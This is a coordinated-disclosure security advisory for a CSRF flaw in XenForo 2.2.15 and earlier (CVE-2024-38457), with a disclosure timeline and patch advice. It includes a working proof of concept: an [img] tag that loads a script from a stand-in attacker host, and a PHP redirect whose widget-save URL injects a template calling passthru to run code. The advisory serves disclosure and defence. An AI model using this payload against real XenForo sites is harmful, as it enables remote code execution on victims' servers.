egix@karmainsecurity ~ $

XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability

• Software Link:

https://xenforo.com

• Affected Versions:

Version 2.2.15 and prior versions.

• Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined into the /src/XF/Admin/Controller/Widget.php script, does not check whether the current HTTP request is a POST or a GET before saving a widget. XenForo does perform anti-CSRF checks for POST requests only, as such this method can be abused in a Cross-Site Request Forgery (CSRF) attack to create/modify arbitrary XenForo widgets via GET requests, and this can also be exploited in tandem with KIS-2024-06 to perform CSRF-based Remote Code Execution (RCE) attacks.

Furthermore, XenForo implements a BB code system, as such this vulnerability could also be exploited through “Stored CSRF” attacks by abusing the [img] BB code tag, creating a thread or a private message (to be sent to the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website could be something like this:

1<?php
2
3$url = "https://victim.website/xenforo/";
4
5header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");
6
7?>

Successful exploitation of this vulnerability requires a victim user with permissions to administer styles or widgets to be currently logged into the Admin Control Panel.

• Solution:

Update to a fixed version or apply the vendor patches.

• Disclosure Timeline:

[22/02/2024] – Vulnerability details sent to SSD Secure Disclosure

[05/06/2024] – Vendor released patches and fixed versions

[14/06/2024] – CVE identifier requested

[16/06/2024] – CVE identifier assigned

[16/07/2024] – Coordinated public disclosure

• CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-38457 to this vulnerability.

• Credits:

Vulnerability discovered by Egidio Romano.

• Other References:

https://xenforo.com/community/threads/222133

https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/